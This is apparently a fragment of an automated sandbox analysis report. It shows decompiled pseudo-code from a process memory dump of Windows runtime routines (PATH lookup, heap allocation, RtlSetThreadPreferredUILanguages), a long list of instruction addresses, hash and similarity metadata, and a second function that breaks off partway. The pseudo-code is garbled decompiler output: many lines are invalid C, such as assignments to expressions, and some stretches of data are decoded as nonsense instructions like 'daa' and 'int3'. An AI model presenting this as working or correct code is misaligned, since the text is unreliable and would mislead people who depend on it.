				asm("movsd");
				_v16 = 0;
				_t271 = 0x48;
				_t308 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t320 = 0;
				_v37 = _t308;
				if(_v48 <= 0) {
					L16:
					_t45 = _t271 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t328 = 0xc0000106;
						goto L32;
					} else {
						_t327 = L033C4620(_t282,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t271);
						_v52 = _t327;
						__eflags = _t327;
						if(_t327 == 0) {
							_t328 = 0xc0000017;
							goto L32;
						} else {
							 *(_t327 + 0x44) =  *(_t327 + 0x44) & 0x00000000;
							_t50 = _t327 + 0x48; // 0x48
							_t322 = _t50;
							_t308 = _v32;
							 *(_t327 + 0x3c) = _t271;
							_t273 = 0;
							 *((short*)(_t327 + 0x30)) = _v48;
							__eflags = _t308;
							if(_t308 != 0) {
								 *(_t327 + 0x18) = _t322;
								__eflags = _t308 - 0x3498478;
								 *_t327 = ((0 | _t308 == 0x03498478) - 0x00000001 & 0xfffffffb) + 7;
								E033EF3E0(_t322,  *((intOrPtr*)(_t308 + 4)),  *_t308 & 0x0000ffff);
								_t308 = _v32;
								_t337 = _t337 + 0xc;
								_t273 = 1;
								__eflags = _a8;
								_t322 = _t322 + (( *_t308 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t265 = E034339F2(_t322);
									_t308 = _v32;
									_t322 = _t265;
								}
							}
							_t286 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t328 = _v68;
								__eflags = 0;
								 *((short*)(_t322 - 2)) = 0;
								goto L32;
							} else {
								_t271 = _t327 + _t273 * 4;
								_v56 = _t271;
								do {
									__eflags = _t308;
									if(_t308 != 0) {
										_t231 =  *(_v60 + _t286 * 4);
										__eflags = _t231;
										if(_t231 == 0) {
											goto L30;
										} else {
											__eflags = _t231 == 5;
											if(_t231 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t271 =  *(_v60 + _t286 * 4);
										 *(_t271 + 0x18) = _t322;
										_t235 =  *(_v60 + _t286 * 4);
										__eflags = _t235 - 8;
										if(_t235 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t235 * 4 +  &M033D2959))) {
												case 0:
													__ax =  *0x3498488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E033EF3E0(__edi,  *0x349848c, __ax & 0x0000ffff);
														__eax =  *0x3498488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E033EF3E0(_t322, _v80, _v64);
													_t260 = _v64;
													goto L26;
												case 2:
													 *0x3498480 & 0x0000ffff = E033EF3E0(__edi,  *0x3498484,  *0x3498480 & 0x0000ffff);
													__eax =  *0x3498480 & 0x0000ffff;
													__eax = ( *0x3498480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E033EF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E033EF3E0(_t322, _v76, _v36);
														_t260 = _v36;
													}
													L26:
													_t337 = _t337 + 0xc;
													_t322 = _t322 + (_t260 >> 1) * 2 + 2;
													__eflags = _t322;
													L27:
													_push(0x3b);
													_pop(_t262);
													 *((short*)(_t322 - 2)) = _t262;
													goto L28;
												case 6:
													__ebx =  *0x349575c;
													__eflags = __ebx - 0x349575c;
													if(__ebx != 0x349575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E033EF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x349575c;
														} while (__ebx != 0x349575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x3498478 & 0x0000ffff = E033EF3E0(__edi,  *0x349847c,  *0x3498478 & 0x0000ffff);
													__eax =  *0x3498478 & 0x0000ffff;
													__eax = ( *0x3498478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E034339F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x3496e58 & 0x0000ffff = E033EF3E0(__edi,  *0x3496e5c,  *0x3496e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x3496e58 & 0x0000ffff;
													__eax = ( *0x3496e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t286 = _v16;
													_t308 = _v32;
													L29:
													_t271 = _t271 + 4;
													__eflags = _t271;
													_v56 = _t271;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t286 = _t286 + 1;
									_v16 = _t286;
									__eflags = _t286 - _v48;
								} while (_t286 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t235 =  *(_v60 + _t320 * 4);
						if(_t235 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t235 * 4 +  &M033D2935))) {
							case 0:
								__ax =  *0x3498488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t308 =  &_v64;
								_v80 = E033D2E3E(0,  &_v64);
								_t271 = _t271 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x3498480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3498480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E033BEEF0(0x34979a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E033BEB70(__ecx, 0x34979a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t209 = _v72;
											__eflags = _t209;
											if(_t209 != 0) {
												L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
											}
											_t210 = _v52;
											__eflags = _t210;
											if(_t210 != 0) {
												__eflags = _t328;
												if(_t328 < 0) {
													L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t210);
													_t210 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t282 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x3497b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L033C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E033BEB70(__ecx, 0x34979a0);
										__eax = _v52;
										L36:
										_pop(_t321);
										_pop(_t329);
										__eflags = _v8 ^ _t334;
										_pop(_t272);
										return E033EB640(_t210, _t272, _v8 ^ _t334, _t308, _t321, _t329);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t267 = _v56;
								if(_v56 != 0) {
									_t308 =  &_v36;
									_t269 = E033D2E3E(_t267,  &_v36);
									_t282 = _v36;
									_v76 = _t269;
								}
								if(_t282 == 0) {
									goto L44;
								} else {
									_t271 = _t271 + 2 + _t282;
								}
								goto L14;
							case 6:
								__eax =  *0x3495764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x3498478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3498478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x3496e58 & 0x0000ffff;
								__eax = ( *0x3496e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t320 = _t320 + 1;
								if(_t320 >= _v48) {
									goto L16;
								} else {
									_t308 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					__eflags = _t235 - 0x3d286603;
					_t339 = _t337 + _t235;
					asm("daa");
					__eflags = _t235 - 0x3d262e03;
					_t236 = _t235 +  *((intOrPtr*)(_t327 + 0x28));
					__eflags = _t236 - 0x3d260503;
					_t237 = _t236 +  *((intOrPtr*)(_t308 +  *((intOrPtr*)(_t236 +  &_a1530200889))));
					 *0x3d288003 =  *0x3d288003 - _t322;
					asm("daa");
					_t237 - 0x3d281e03 = _t237 - 0x3d275d03;
					_t278 = 0x25;
					_t331 = _t327 + _t327 +  *((intOrPtr*)(_t237 +  &_a1546912569));
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x347ff00);
					E033FD08C(_t278, _t322, _t331);
					_v44 =  *[fs:0x18];
					_t323 = 0;
					 *_a24 = 0;
					_t279 = _a12;
					__eflags = _t279;
					if(_t279 == 0) {
						_t240 = 0xc0000100;
					} else {
						_v8 = 0;
						_t332 = 0xc0000100;
						_v52 = 0xc0000100;
						_t242 = 4;
						while(1) {
							_v40 = _t242;
							__eflags = _t242;
							if(_t242 == 0) {
								break;
							}
							_t298 = _t242 * 0xc;
							_v48 = _t298;
							__eflags = _t279 -  *((intOrPtr*)(_t298 + 0x3381664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t257 = E033EE5C0(_a8,  *((intOrPtr*)(_t298 + 0x3381668)), _t279);
									_t339 = _t339 + 0xc;
									__eflags = _t257;
									if(__eflags == 0) {
										_t332 = E034251BE(_t279,  *((intOrPtr*)(_v48 + 0x338166c)), _a16, _t323, _t332, __eflags, _a20, _a24);
										_v52 = _t332;
										break;
									} else {
										_t242 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t242 = _t242 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t332;
						__eflags = _t332;
						if(_t332 < 0) {
							__eflags = _t332 - 0xc0000100;
							if(_t332 == 0xc0000100) {
								_t294 = _a4;
								__eflags = _t294;
								if(_t294 != 0) {
									_v36 = _t294;
									__eflags =  *_t294 - _t323;
									if( *_t294 == _t323) {
										_t332 = 0xc0000100;
										goto L76;
									} else {
										_t311 =  *((intOrPtr*)(_v44 + 0x30));
										_t244 =  *((intOrPtr*)(_t311 + 0x10));
										__eflags =  *((intOrPtr*)(_t244 + 0x48)) - _t294;
										if( *((intOrPtr*)(_t244 + 0x48)) == _t294) {
											__eflags =  *(_t311 + 0x1c);
											if( *(_t311 + 0x1c) == 0) {
												L106:
												_t332 = E033D2AE4( &_v36, _a8, _t279, _a16, _a20, _a24);
												_v32 = _t332;
												__eflags = _t332 - 0xc0000100;
												if(_t332 != 0xc0000100) {
													goto L69;
												} else {
													_t323 = 1;
													_t294 = _v36;
													goto L75;
												}
											} else {
												_t247 = E033B6600( *(_t311 + 0x1c));
												__eflags = _t247;
												if(_t247 != 0) {
													goto L106;
												} else {
													_t294 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t332 = E033D2C50(_t294, _a8, _t279, _a16, _a20, _a24, _t323);
											L76:
											_v32 = _t332;
											goto L69;
										}
									}
									goto L108;
								} else {
									E033BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t332 = _a24;
									_t254 = E033D2AE4( &_v36, _a8, _t279, _a16, _a20, _t332);
									_v32 = _t254;
									__eflags = _t254 - 0xc0000100;
									if(_t254 == 0xc0000100) {
										_v32 = E033D2C50(_v36, _a8, _t279, _a16, _a20, _t332, 1);
									}
									_v8 = _t323;
									E033D2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t240 = _t332;
					}
					L70:
					return E033FD0D1(_t240);
				}
				L108:
			}




















































                                          0x033d2584
                                          0x033d2586
                                          0x033d2590
                                          0x033d2596
                                          0x033d2597
                                          0x033d2598
                                          0x033d2599
                                          0x033d259e
                                          0x033d25a4
                                          0x033d25a9
                                          0x033d25ac
                                          0x033d25ae
                                          0x033d25b1
                                          0x033d25b2
                                          0x033d25b5
                                          0x033d25b8
                                          0x033d25bb
                                          0x033d25bc
                                          0x033d25bf
                                          0x033d25c2
                                          0x033d25c5
                                          0x033d25c6
                                          0x033d25cb
                                          0x033d25ce
                                          0x033d25d8
                                          0x033d25dd
                                          0x033d25de
                                          0x033d25e1
                                          0x033d25e3
                                          0x033d25e9
                                          0x033d26da
                                          0x033d26da
                                          0x033d26dd
                                          0x033d26e2
                                          0x03415b56
                                          0x00000000
                                          0x033d26e8
                                          0x033d26f9
                                          0x033d26fb
                                          0x033d26fe
                                          0x033d2700
                                          0x03415b60
                                          0x00000000
                                          0x033d2706
                                          0x033d2706
                                          0x033d270a
                                          0x033d270a
                                          0x033d270d
                                          0x033d2713
                                          0x033d2716
                                          0x033d2718
                                          0x033d271c
                                          0x033d271e
                                          0x03415b6c
                                          0x03415b6f
                                          0x03415b7f
                                          0x03415b89
                                          0x03415b8e
                                          0x03415b93
                                          0x03415b96
                                          0x03415b9c
                                          0x03415ba0
                                          0x03415ba3
                                          0x03415bab
                                          0x03415bb0
                                          0x03415bb3
                                          0x03415bb3
                                          0x03415ba3
                                          0x033d2724
                                          0x033d2726
                                          0x033d2729
                                          0x033d272c
                                          0x033d279d
                                          0x033d279d
                                          0x033d27a0
                                          0x033d27a2
                                          0x00000000
                                          0x033d272e
                                          0x033d272e
                                          0x033d2731
                                          0x033d2734
                                          0x033d2734
                                          0x033d2736
                                          0x03415bc1
                                          0x03415bc1
                                          0x03415bc4
                                          0x00000000
                                          0x03415bca
                                          0x03415bca
                                          0x03415bcd
                                          0x00000000
                                          0x03415bd3
                                          0x00000000
                                          0x03415bd3
                                          0x03415bcd
                                          0x033d273c
                                          0x033d273c
                                          0x033d2742
                                          0x033d2747
                                          0x033d274a
                                          0x033d274d
                                          0x033d2750
                                          0x00000000
                                          0x033d2756
                                          0x033d2756
                                          0x00000000
                                          0x033d2902
                                          0x033d2908
                                          0x033d290b
                                          0x00000000
                                          0x033d2911
                                          0x033d291c
                                          0x033d2921
                                          0x00000000
                                          0x033d2921
                                          0x00000000
                                          0x00000000
                                          0x033d2880
                                          0x033d2887
                                          0x033d288c
                                          0x00000000
                                          0x00000000
                                          0x033d2805
                                          0x033d280a
                                          0x033d2814
                                          0x033d2816
                                          0x00000000
                                          0x00000000
                                          0x033d281e
                                          0x033d2821
                                          0x033d2823
                                          0x00000000
                                          0x033d2829
                                          0x033d2829
                                          0x033d2831
                                          0x033d283c
                                          0x033d283e
                                          0x00000000
                                          0x033d283e
                                          0x00000000
                                          0x00000000
                                          0x033d284e
                                          0x033d2850
                                          0x033d2851
                                          0x033d2854
                                          0x033d2857
                                          0x033d285a
                                          0x033d285c
                                          0x033d285d
                                          0x00000000
                                          0x00000000
                                          0x033d275d
                                          0x033d2761
                                          0x00000000
                                          0x033d2767
                                          0x033d276e
                                          0x033d2773
                                          0x033d2773
                                          0x033d2776
                                          0x033d2778
                                          0x033d277e
                                          0x033d277e
                                          0x033d2781
                                          0x033d2781
                                          0x033d2783
                                          0x033d2784
                                          0x00000000
                                          0x00000000
                                          0x03415bd8
                                          0x03415bde
                                          0x03415be4
                                          0x03415be6
                                          0x03415be8
                                          0x03415be9
                                          0x03415bee
                                          0x03415bf8
                                          0x03415bff
                                          0x03415c01
                                          0x03415c04
                                          0x03415c07
                                          0x03415c0b
                                          0x03415c0d
                                          0x03415c0d
                                          0x03415c15
                                          0x03415c18
                                          0x03415c1b
                                          0x03415c1b
                                          0x03415c1e
                                          0x00000000
                                          0x00000000
                                          0x033d28c3
                                          0x033d28c8
                                          0x033d28d2
                                          0x033d28d4
                                          0x033d28d8
                                          0x033d28db
                                          0x03415c26
                                          0x03415c28
                                          0x03415c2d
                                          0x03415c2d
                                          0x00000000
                                          0x00000000
                                          0x03415c34
                                          0x03415c36
                                          0x03415c49
                                          0x03415c4e
                                          0x03415c54
                                          0x03415c5b
                                          0x03415c5d
                                          0x03415c60
                                          0x033d2788
                                          0x033d2788
                                          0x033d278b
                                          0x033d278e
                                          0x033d278e
                                          0x033d278e
                                          0x033d2791
                                          0x00000000
                                          0x00000000
                                          0x033d2756
                                          0x033d2750
                                          0x00000000
                                          0x033d2794
                                          0x033d2794
                                          0x033d2795
                                          0x033d2798
                                          0x033d2798
                                          0x00000000
                                          0x033d2734
                                          0x033d272c
                                          0x033d2700
                                          0x033d25ef
                                          0x033d25ef
                                          0x033d25ef
                                          0x033d25f2
                                          0x033d25f8
                                          0x00000000
                                          0x00000000
                                          0x033d25fe
                                          0x00000000
                                          0x033d28e6
                                          0x033d28ec
                                          0x033d28ef
                                          0x033d28f5
                                          0x033d28f8
                                          0x033d28f8
                                          0x00000000
                                          0x033d28f8
                                          0x00000000
                                          0x00000000
                                          0x033d2866
                                          0x033d2866
                                          0x033d2876
                                          0x033d2879
                                          0x00000000
                                          0x00000000
                                          0x033d27e0
                                          0x033d27e7
                                          0x033d27e9
                                          0x033d27eb
                                          0x03415afd
                                          0x00000000
                                          0x03415afd
                                          0x00000000
                                          0x00000000
                                          0x033d2633
                                          0x033d2638
                                          0x033d263b
                                          0x033d263c
                                          0x033d263e
                                          0x033d2640
                                          0x033d2642
                                          0x033d2647
                                          0x033d2649
                                          0x033d264e
                                          0x033d2650
                                          0x033d2653
                                          0x033d2659
                                          0x033d26a2
                                          0x033d26a7
                                          0x033d26ac
                                          0x033d26b2
                                          0x03415b11
                                          0x03415b15
                                          0x03415b17
                                          0x00000000
                                          0x033d26b8
                                          0x033d26b8
                                          0x033d26ba
                                          0x033d27a6
                                          0x033d27a6
                                          0x033d27a9
                                          0x033d27ab
                                          0x033d27b9
                                          0x033d27b9
                                          0x033d27be
                                          0x033d27c1
                                          0x033d27c3
                                          0x033d27c5
                                          0x033d27c7
                                          0x03415c74
                                          0x03415c79
                                          0x03415c79
                                          0x033d27c7
                                          0x00000000
                                          0x033d26c0
                                          0x033d26c0
                                          0x033d26c3
                                          0x033d26c6
                                          0x033d26c6
                                          0x033d26c9
                                          0x033d26c9
                                          0x00000000
                                          0x033d26c9
                                          0x033d26ba
                                          0x033d265b
                                          0x033d265b
                                          0x033d265e
                                          0x033d2667
                                          0x033d266d
                                          0x033d2677
                                          0x033d267c
                                          0x033d267f
                                          0x033d2681
                                          0x03415b49
                                          0x03415b4e
                                          0x033d27cd
                                          0x033d27d0
                                          0x033d27d1
                                          0x033d27d2
                                          0x033d27d4
                                          0x033d27dd
                                          0x033d2687
                                          0x033d2687
                                          0x033d268a
                                          0x033d268b
                                          0x033d268e
                                          0x033d268f
                                          0x033d2691
                                          0x033d2696
                                          0x033d2698
                                          0x033d269d
                                          0x033d269f
                                          0x00000000
                                          0x033d269f
                                          0x033d2681
                                          0x00000000
                                          0x00000000
                                          0x033d2846
                                          0x00000000
                                          0x00000000
                                          0x033d2605
                                          0x033d260a
                                          0x033d260c
                                          0x033d2611
                                          0x033d2616
                                          0x033d2619
                                          0x033d2619
                                          0x033d261e
                                          0x00000000
                                          0x033d2624
                                          0x033d2627
                                          0x033d2627
                                          0x00000000
                                          0x00000000
                                          0x03415b1f
                                          0x00000000
                                          0x00000000
                                          0x033d2894
                                          0x033d289b
                                          0x033d289d
                                          0x033d28a1
                                          0x03415b2b
                                          0x03415b2e
                                          0x03415b2e
                                          0x033d28a7
                                          0x033d28a9
                                          0x03415b04
                                          0x03415b09
                                          0x03415b09
                                          0x03415b09
                                          0x00000000
                                          0x00000000
                                          0x03415b35
                                          0x03415b3c
                                          0x033d28fb
                                          0x033d28fb
                                          0x033d26cc
                                          0x033d26cc
                                          0x033d26d0
                                          0x00000000
                                          0x033d26d2
                                          0x033d26d2
                                          0x00000000
                                          0x033d26d2
                                          0x00000000
                                          0x00000000
                                          0x033d25fe
                                          0x033d292d
                                          0x033d2930
                                          0x033d2935
                                          0x033d2937
                                          0x033d293c
                                          0x033d293e
                                          0x033d293f
                                          0x033d2944
                                          0x033d2947
                                          0x033d2958
                                          0x033d295a
                                          0x033d2962
                                          0x033d296b
                                          0x033d2972
                                          0x033d2974
                                          0x033d297e
                                          0x033d297f
                                          0x033d2980
                                          0x033d2981
                                          0x033d2982
                                          0x033d2983
                                          0x033d2984
                                          0x033d2985
                                          0x033d2986
                                          0x033d2987
                                          0x033d2988
                                          0x033d2989
                                          0x033d298a
                                          0x033d298b
                                          0x033d298c
                                          0x033d298d
                                          0x033d298e
                                          0x033d298f
                                          0x033d2990
                                          0x033d2992
                                          0x033d2997
                                          0x033d29a3
                                          0x033d29a6
                                          0x033d29ab
                                          0x033d29ad
                                          0x033d29b0
                                          0x033d29b2
                                          0x03415c80
                                          0x033d29b8
                                          0x033d29b8
                                          0x033d29bb
                                          0x033d29c0
                                          0x033d29c5
                                          0x033d29c6
                                          0x033d29c6
                                          0x033d29c9
                                          0x033d29cb
                                          0x00000000
                                          0x00000000
                                          0x033d29cd
                                          0x033d29d0
                                          0x033d29d9
                                          0x033d29db
                                          0x033d29dd
                                          0x033d2a7f
                                          0x033d2a84
                                          0x033d2a87
                                          0x033d2a89
                                          0x03415ca1
                                          0x03415ca3
                                          0x00000000
                                          0x033d2a8f
                                          0x033d2a8f
                                          0x00000000
                                          0x033d2a8f
                                          0x00000000
                                          0x033d29e3
                                          0x033d29e3
                                          0x033d29e3
                                          0x00000000
                                          0x033d29e3
                                          0x033d29dd
                                          0x00000000
                                          0x033d29db
                                          0x033d29e6
                                          0x033d29e9
                                          0x033d29eb
                                          0x033d29ed
                                          0x033d29f3
                                          0x033d29f5
                                          0x033d29f8
                                          0x033d29fa
                                          0x033d2a97
                                          0x033d2a9a
                                          0x033d2a9d
                                          0x033d2add
                                          0x00000000
                                          0x033d2a9f
                                          0x033d2aa2
                                          0x033d2aa5
                                          0x033d2aa8
                                          0x033d2aab
                                          0x03415cab
                                          0x03415caf
                                          0x03415cc5
                                          0x03415cda
                                          0x03415cdc
                                          0x03415cdf
                                          0x03415ce5
                                          0x00000000
                                          0x03415ceb
                                          0x03415ced
                                          0x03415cee
                                          0x00000000
                                          0x03415cee
                                          0x03415cb1
                                          0x03415cb4
                                          0x03415cb9
                                          0x03415cbb
                                          0x00000000
                                          0x03415cbd
                                          0x03415cbd
                                          0x00000000
                                          0x03415cbd
                                          0x03415cbb
                                          0x033d2ab1
                                          0x033d2ab1
                                          0x033d2ac4
                                          0x033d2ac6
                                          0x033d2ac6
                                          0x00000000
                                          0x033d2ac6
                                          0x033d2aab
                                          0x00000000
                                          0x033d2a00
                                          0x033d2a09
                                          0x033d2a0e
                                          0x033d2a21
                                          0x033d2a24
                                          0x033d2a35
                                          0x033d2a3a
                                          0x033d2a3d
                                          0x033d2a42
                                          0x033d2a59
                                          0x033d2a59
                                          0x033d2a5c
                                          0x033d2a5f
                                          0x033d2a5f
                                          0x033d29fa
                                          0x033d29f3
                                          0x033d2a64
                                          0x033d2a64
                                          0x033d2a6b
                                          0x033d2a6b
                                          0x033d2a6d
                                          0x033d2a72
                                          0x033d2a72
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: PATH
                                          • API String ID: 0-1036084923
                                          • Opcode ID: 7bbef7d2e18f95e44038f3223988af32bc9c3bd299521e2eb4ab2437dd9c37aa
                                          • Instruction ID: 6c0cbe9fba37301d0c612ba3e8b30caa33e0cafbca6cdfc0a9d1c1a192d676ed
                                          • Opcode Fuzzy Hash: 7bbef7d2e18f95e44038f3223988af32bc9c3bd299521e2eb4ab2437dd9c37aa
                                          • Instruction Fuzzy Hash: A9C17F76E00219DBDB25DF99E8C0AAEB7B5FF49700F08441AF811FB250D774A951CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033DFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E033DFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E033BEEF0(0x3497b60);
					_t134 =  *0x3497b84; // 0x77ad7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x3497b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x3497b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E033B6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E033B76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E03448938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E033AB150();
													}
													_t116 = E03446D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E033B75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
